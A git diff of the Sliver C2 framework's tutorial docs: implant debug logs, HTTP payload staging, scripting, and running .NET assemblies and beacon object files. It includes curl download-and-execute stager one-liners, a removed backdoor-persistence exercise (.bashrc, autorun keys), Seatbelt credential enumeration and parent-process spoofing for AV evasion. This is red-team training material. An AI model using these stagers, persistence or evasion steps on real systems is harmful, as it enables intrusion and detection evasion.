.../pages/tutorials/md/6 - Scripting.md | 27 +--- .../tutorials/md/7 - Assemblies and Bofs.md | 133 ++++++++++++++++++ docs/sliver-docs/public/tutorials.json | 2 +- 8 files changed, 140 insertions(+), 92 deletions(-) delete mode 100644 docs/sliver-docs/nohup.out diff --git a/docs/sliver-docs/nohup.out b/docs/sliver-docs/nohup.out deleted file mode 100644 index afaa8899b6..0000000000 --- a/docs/sliver-docs/nohup.out +++ /dev/null @@ -1,54 +0,0 @@ -2024/05/03 14:11:58 sliver.go:90: Hello my name is HIGH_EXTERNAL -2024/05/03 14:11:58 limits.go:58: Limit checks completed -2024/05/03 14:11:58 sliver.go:108: Running in session mode -2024/05/03 14:11:58 session.go:67: Starting interactive session connection loop ... -2024/05/03 14:11:58 transports.go:41: Starting c2 url generator () ... -2024/05/03 14:11:58 transports.go:104: Return generator: (chan *url.URL)(0xc0000966c0) -2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' -2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' -2024/05/03 14:11:58 session.go:84: Next CC = https://localhost -2024/05/03 14:11:58 session.go:84: Next CC = https://localhost -2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' -2024/05/03 14:11:58 session.go:172: Connecting -> http(s)://localhost -2024/05/03 14:11:58 provider_darwin.go:145: [proxy.Provider.readDarwinNetworkSettingProxy]: https proxy is not enabled. -2024/05/03 14:11:58 httpclient.go:873: [http] segments = [authenticate auth authenticate auth], filename = index, ext = php -2024/05/03 14:11:58 httpclient.go:354: [http] POST -> https://localhost/authenticate/auth/authenticate/auth/index.html?q=78232565492 (266 bytes) -2024/05/03 14:11:58 httpclient.go:360: [http] http response error: Post "https://localhost/authenticate/auth/authenticate/auth/index.html?q=78232565492": dial tcp [::1]:443: connect: connection refused -2024/05/03 14:11:58 provider_darwin.go:145: [proxy.Provider.readDarwinNetworkSettingProxy]: https proxy is not enabled. -2024/05/03 14:11:58 httpclient.go:873: [http] segments = [v1 authenticate authenticate], filename = register, ext = php -2024/05/03 14:11:58 httpclient.go:354: [http] POST -> http://localhost/v1/authenticate/authenticate/register.html?a=267051467451 (266 bytes) -2024/05/03 14:11:58 httpclient.go:403: [http] New session id: f1f551818cd5f7f3958caac2b091425a -2024/05/03 14:11:58 sliver.go:288: Host Uuid: c6de1a44-016a-5fbe-b76a-da56af41316d -2024/05/03 14:11:58 tun.go:53: [tunnel] Tunnel handlers map[20:0x57fdde0 22:0x57fb5a0 23:0x57fa7a0 80:0x57fc200 82:0x57ffac0 125:0x5801a20] -2024/05/03 14:11:58 session.go:189: [http] send envelope ... -2024/05/03 14:11:58 httpclient.go:873: [http] segments = [script script bundles], filename = route, ext = js -2024/05/03 14:11:58 httpclient.go:421: [http] GET -> http://localhost/script/script/bundles/route.js?j=20150g3730272 -2024/05/03 14:11:58 httpclient.go:873: [http] segments = [authenticate auth v1 v1], filename = index, ext = php -2024/05/03 14:11:58 httpclient.go:498: [http] POST -> http://localhost/authenticate/auth/v1/v1/index.php?l=363491c102551 (291 bytes) -2024/05/03 14:11:58 httpclient.go:504: [http] POST request completed -2024/05/03 14:12:01 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:01 httpclient.go:873: [http] segments = [javascripts bundles script], filename = app, ext = js -2024/05/03 14:12:01 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/script/app.js?i=633022582114 -2024/05/03 14:12:03 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:03 httpclient.go:873: [http] segments = [javascripts script], filename = app, ext = js -2024/05/03 14:12:03 httpclient.go:421: [http] GET -> http://localhost/javascripts/script/app.js?d=40n0813096227 -2024/05/03 14:12:05 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:05 httpclient.go:873: [http] segments = [javascripts script bundles], filename = route, ext = js -2024/05/03 14:12:05 httpclient.go:421: [http] GET -> http://localhost/javascripts/script/bundles/route.js?j=1w00262k790643 -2024/05/03 14:12:07 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:07 httpclient.go:873: [http] segments = [javascripts bundles], filename = app, ext = js -2024/05/03 14:12:07 sliver.go:198: [recv] sysHandler 12 -2024/05/03 14:12:07 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/app.js?t=407557639s971 -2024/05/03 14:12:07 session.go:189: [http] send envelope ... -2024/05/03 14:12:07 httpclient.go:873: [http] segments = [authenticate rest], filename = rpc, ext = php -2024/05/03 14:12:07 httpclient.go:498: [http] POST -> http://localhost/authenticate/rest/rpc.php?c=15m4230363028 (121 bytes) -2024/05/03 14:12:07 httpclient.go:504: [http] POST request completed -2024/05/03 14:12:09 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:09 httpclient.go:873: [http] segments = [script scripts script bundles], filename = route, ext = js -2024/05/03 14:12:09 httpclient.go:421: [http] GET -> http://localhost/script/scripts/script/bundles/route.js?f=364809635s50 -2024/05/03 14:12:11 httpclient.go:304: Cancelling poll context -2024/05/03 14:12:11 httpclient.go:873: [http] segments = [javascripts bundles javascripts], filename = route, ext = js -2024/05/03 14:12:11 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/javascripts/route.js?t=631v134417400 -2024/05/03 14:12:11 sliver.go:177: [recv] specialHandler 4 -2024/05/03 14:12:11 session.go:164: [http] Stop() -2024/05/03 14:12:11 session.go:155: [http] lost connection, cleanup... diff --git a/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md b/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md index 77eeea2e2d..fad0f82d71 100644 --- a/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md +++ b/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md @@ -1,4 +1,4 @@ -This course will use the latest Sliver build, you can download it from [insert local web server]. +# This course is intented for the 1.6 version of Sliver, which is not yet published `sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately. @@ -85,4 +85,4 @@ Running an interactive shell ```asciinema {"src": "/asciinema/shell.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} -``` \ No newline at end of file +``` diff --git a/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md index 0e1e7d330d..4ee90e4423 100644 --- a/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md +++ b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md @@ -1,5 +1,3 @@ -# Beacons vs Sessions - Sliver implants support two types of connections, sessions and beacons. Sessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden. @@ -66,8 +64,6 @@ Commands issued for beacons can be viewed using `tasks`, the task state will ind {"src": "/asciinema/beacon_tasks.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` -beacon_tasks.cast - Session can be spun up using the `interractive` command. ```asciinema diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index d811578a9b..8540db9e7c 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -1,5 +1,3 @@ -# Stagers - When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command. For this exercise we will create a new beacon profile and prepare to stage it. @@ -18,7 +16,7 @@ There is a lot of flexibility in the form of this URL, the conditions for succes * There has to be a one character http url parameter * The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values -To expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed. +To expose a payload you need to use the `implants stage` command and specifically select the implant to leave accessible. ```asciinema {"src": "/asciinema/stage_implant.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} @@ -45,4 +43,4 @@ curl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && c Or on Windows: ``` curl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\t.exe -``` \ No newline at end of file +``` diff --git a/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md index 28f667937f..108edb586a 100644 --- a/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md +++ b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md @@ -1,5 +1,3 @@ -# Pivots - Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to. Sliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only. diff --git a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md index 5cd4143233..85ce695349 100644 --- a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md +++ b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md @@ -1,5 +1,3 @@ -## Sliver Reactions - Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events. ```bash @@ -49,7 +47,7 @@ You can remove reactions using `reaction unset`. However, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. -Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session. +Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript for example to connect to the server over gRPC, which we’ll cover next. ## Sliver-py @@ -74,16 +72,10 @@ Since our extension is essentially going to be another client connection to the [*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg ``` -We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip: - -```html -pip3 install ipython3 -``` - +We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. We first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server. ```bash -tester@test ~/t/sliver> ipython3 Python 3.9.16 (main, Dec 7 2022, 10:06:04) Type 'copyright', 'credits' or 'license' for more information IPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help. @@ -224,18 +216,3 @@ b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS fil Automatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2 b'##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1... ``` - -As an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key. - -Here are a couple hints: - -- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc -- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload("/home/target/.bashrc", contents + b'\r\necho "pwned !"')`. -- For Windows you can look at the `registry_read` and `registry_create_key` functions. - -## References - -- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client) -- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/) -- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py) -- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script) diff --git a/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md b/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md index e69de29bb2..8d695f95b9 100644 --- a/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md +++ b/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md @@ -0,0 +1,133 @@ +The Sliver armory is used to install and maintain third party extensions and aliases within sliver. The full list of available extensions can be found at https://github.com/sliverarmory/armory, keep in mind this is community maintained so not all modules are necessarily up to date. + +You can download all configured extensions/aliases using the armory command. + +```bash +[server] sliver > armory install all +? Install 18 aliases and 84 extensions? Yes +[*] Installing alias 'SharpSecDump' (v0.0.1) ... done! +[*] Installing alias 'SharpChrome' (v0.0.1) ... done! +[*] Installing alias 'SharpDPAPI' (v0.0.1) ... done! +[*] Installing alias 'SharpMapExec' (v0.0.1) ... done! +[*] Installing alias 'KrbRelayUp' (v0.0.1) ... done! +[*] Installing alias 'SharpRDP' (v0.0.1) ... done! +[*] Installing alias 'SharpUp' (v0.0.1) ... done! +[*] Installing alias 'SharpView' (v0.0.1) ... done! +[*] Installing alias 'SharPersist' (v0.0.1) ... done! +[*] Installing alias 'Sharp WMI' (v0.0.2) ... done! +... +[*] All packages installed +``` + +These commands can then be used in the context of a session or beacon similarly to other commands, with a couple caveats. + +Let’s go ahead and run our first assembly. + +```bash +[server] sliver (UNABLE_PRIDE) > seatbelt " WindowsCredentialFiles" + +[*] seatbelt output: + + %&&@@@&& + &&&&&&&%%%, #&&@@@@@@%%%%%%###############% + &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%% +%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################((((((((((((((((((( +#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################((((((((((((((((((( +#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#(((((((((( +#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####(((((((( +#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((##### +###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((##### +#####%###################### %%%.. @////(((&%%%%%%%################ + &%& %%%%% Seatbelt %////(((&%%%%%%%%#############* + &%%&&&%%%%% v1.1.1 ,(((&%%%%%%%%%%%%%%%%%, + #%%%%##, + +====== WindowsCredentialFiles ====== + + Folder : C:\Users\defaultuser0\AppData\Local\Microsoft\Credentials\ + + ... +``` + +As you can see Sliver ran the Seatbelt assembly and provided us with the output of our command. Let’s investigate how exactly that happened. + +The first thing we can notice is a new process spinning up when we run our command. + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ae07f231-691e-4933-883f-fa368d0f78e6/Untitled.png) + +Taking a closer look, that process is a child of our implant `UNABLE_PRIDE.exe`. + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/2dfe565c-6429-4b74-a916-5a920f0ca85e/Untitled.png) + +If you look at the assemblies loaded in that process, you’ll notice that the .NET clr along with the Seatbelt code are loaded into memory. + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a92e524b-dda2-4b41-8254-3fc47e2ed025/Untitled.png) + +All of this information indicates this process was used to run a post-exploitation module and will by default get caught by most AV’s. + +A more stealthy approach would be to change the default process to something more realistic and use parent process spoofing in order to mask our activity such as in the example below. + +```bash +[server] sliver (UNABLE_PRIDE) > seatbelt -P 2968 -p "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" " WindowsCredentialFiles" +``` + +In this case we spoof our parent process id to `2968`, a Chrome process that has other similar child processes and set the default program to be `chrome.exe`. + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/93ee0728-be82-4fbb-8084-47f2bd336ece/Untitled.png) + +This already looks a lot better and is more likely to bypass detections. A further improvement could be to identify processes that already load the .net CLR and use those to host our post-exploitation payloads or doing additional obfuscation of our extensions to avoid static detections such as `Seatbelt`,However this is somewhat beyond the scope of this course. + +Another way to avoid detection is by running the assembly in process using the `-i` flag, while that avoids spinning up a new process, if the extension crashes for whatever reason you will loose your implant. + +```bash +[server] sliver (UNABLE_PRIDE) > seatbelt -i " WindowsCredentialFiles" +... +``` + +If we take a look at the process hosting seatbelt, we’ll see its our implant process which will contain the .NET assembly references. + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/37729326-f18b-4250-a873-d4bf4e54b7d5/Untitled.png) + +![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1c05c2f-f2b7-4784-a23b-a837f456cb45/Untitled.png) + +## Bof’s + +Beacon object files are loaded using trustedsec’s coffloader, when you run a bof command the loader will first be loaded into memory and is used to run whichever bof you choose. From an operator’s perspective bof’s are similar to basic sliver commands. + +```bash +[server] sliver (UNABLE_PRIDE) > sa-whoami + +[*] Successfully executed sa-whoami (coff-loader) +[*] Got output: + +UserName SID +====================== ==================================== +test.local\tester + +GROUP INFORMATION Type SID Attributes +================================================= ===================== ============================================= ================================================== +test.local\None Group S-1-5-21-3109228153-3872411817-1195593578-513 Mandatory group, Enabled by default, Enabled group, +Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\Local account and member of Administrators groupWell-known group S-1-5-114 +BUILTIN\Administrators Alias S-1-5-32-544 +BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group, +BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group, +CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group, +LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group, +NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group, +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group, + +Privilege Name Description State +============================= ================================================= =========================== +SeShutdownPrivilege Shut down the system Disabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeUndockPrivilege Remove computer from docking station Disabled +SeIncreaseWorkingSetPrivilege Increase a process working set Disabled +SeTimeZonePrivilege Change the time zone Disabled +``` + +Since these payloads are run in-process, they have similar advantages and drawbacks as in-process assemblies meaning no new processes are spawned on execution, but a crash risks loosing the implant. diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json index 42cf904722..aababd6135 100644 --- a/docs/sliver-docs/public/tutorials.json +++ b/docs/sliver-docs/public/tutorials.json @@ -1 +1 @@ -{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* The file extension needs to match the c2 profile's stager_file_ext\n* There has to be a one character http url parameter\n* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all 